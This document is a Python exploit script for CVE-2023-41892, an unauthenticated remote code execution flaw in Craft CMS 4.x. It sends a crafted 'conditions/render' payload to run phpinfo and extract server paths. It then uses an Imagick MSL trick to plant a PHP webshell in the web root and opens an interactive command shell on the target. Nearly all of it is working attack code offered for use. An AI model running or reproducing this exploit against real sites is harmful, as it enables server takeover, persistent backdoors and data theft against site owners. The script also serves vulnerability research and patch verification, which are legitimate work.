#!/usr/bin/env python3 #coding: utf-8 # Exploit Title: Craft CMS unauthenticated Remote Code Execution (RCE) # Date: 2023-12-26 # Version: 4.0.0-RC1 - 4.4.14 # Vendor Homepage: https://craftcms.com/ # Software Link: https://github.com/craftcms/cms/releases/tag/4.4.14 # Tested on: Ubuntu 22.04.3 LTS # Tested on: Craft CMS 4.4.14 # Exploit Author: Olivier Lasne # CVE : CVE-2023-41892 # References : # https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g # https://blog.calif.io/p/craftcms-rce import requests import sys, re if(len(sys.argv) < 2): print(f"\033[1;96mUsage:\033[0m python {sys.argv[0]} \033[1;96m<url>\033[0m") exit() HOST = sys.argv[1] if not re.match('^https?://.*', HOST): print("\033[1;31m[-]\033[0m URL should start with http or https") exit() print("\033[1;96m[+]\033[0m Executing phpinfo to extract some config infos") ## Execute phpinfo() and extract config info from the website url = HOST + '/index.php' content_type = {'Content-Type': 'application/x-www-form-urlencoded'} data = r'action=conditions/render&test[userCondition]=craft\elements\conditions\users\UserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\\GuzzleHttp\\Psr7\\FnStream","__construct()":[{"close":null}],"_fn_close":"phpinfo"}}' try: r = requests.post(url, headers=content_type, data=data) except: print(f"\033[1;31m[-]\033[0m Could not connect to {HOST}") exit() # If we succeed, we should have default phpinfo credits if not 'PHP Group' in r.text: print(f'\033[1;31m[-]\033[0m {HOST} is not exploitable.') exit() # Extract config value for tmp_dir and document_root pattern1 = r'<tr><td class="e">upload_tmp_dir<\/td><td class="v">(.*?)<\/td><td class="v">(.*?)<\/td><\/tr>' pattern2 = r'<tr><td class="e">\$_SERVER\[\'DOCUMENT_ROOT\'\]<\/td><td class="v">([^<]+)<\/td><\/tr>' tmp_dir = re.search(pattern1, r.text, re.DOTALL).group(1) document_root = re.search(pattern2, r.text, re.DOTALL).group(1) if 'no value' in tmp_dir: tmp_dir = '/tmp' print(f'temporary directory: {tmp_dir}') print(f'web server root: {document_root}') ## Create shell.php in tmp_dir data = { "action": "conditions/render", "configObject[class]": "craft\elements\conditions\ElementCondition", "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"msl:/etc/passwd"}}}' } files = { "image1": ("pwn1.msl", """<?xml version="1.0" encoding="UTF-8"?> <image> <read filename="caption:<?php @system(@$_REQUEST['cmd']); ?>"/> <write filename="info:DOCUMENTROOT/shell.php"/> </image>""".replace("DOCUMENTROOT", document_root), "text/plain") } print(f'\033[1;96m[+]\033[0m create shell.php in {tmp_dir}') r = requests.post(url, data=data, files=files) #, proxies={'http' : ''}) # # Use the Imagick trick to move the webshell in DOCUMENT_ROOT data = { "action": "conditions/render", "configObject[class]": r"craft\elements\conditions\ElementCondition", "config": '{"name":"configObject","as ":{"class":"Imagick", "__construct()":{"files":"vid:msl:' + tmp_dir + r'/php*"}}}' } print(f'\033[1;96m[+]\033[0m trick imagick to move shell.php in {document_root}') r = requests.post(url, data=data) #, proxies={"http": ""}) if r.status_code != 502: print("\033[1;31m[-]\033[0m Exploit failed") exit() print(f"\n\033[1;95m[+]\033[0m Webshell is deployed: {HOST}/\033[1mshell.php\033[0m?cmd=whoami") print(f"\033[1;95m[+]\033[0m Remember to \033[1mdelete shell.php\033[0m in \033[1m{document_root}\033[0m when you're done\n") print("\033[1;92m[!]\033[0m Enjoy your shell\n") url = HOST + '/shell.php' ## Pseudo Shell while True: command = input('\033[1;96m>\033[0m ') if command == 'exit': exit() if command == 'clear' or command == 'cls': print('\n' * 100) print('\033[H\033[3J', end='') continue data = {'cmd' : command} r = requests.post(url, data=data) #, proxies={"http": ""}) # exit if we have an error if r.status_code != 200: print(f"Error: status code {r.status_code} for {url}") exit() res_command = r.text res_command = re.sub('^caption:', '', res_command) res_command = re.sub(' CAPTION.*$', '', res_command) print(res_command, end='')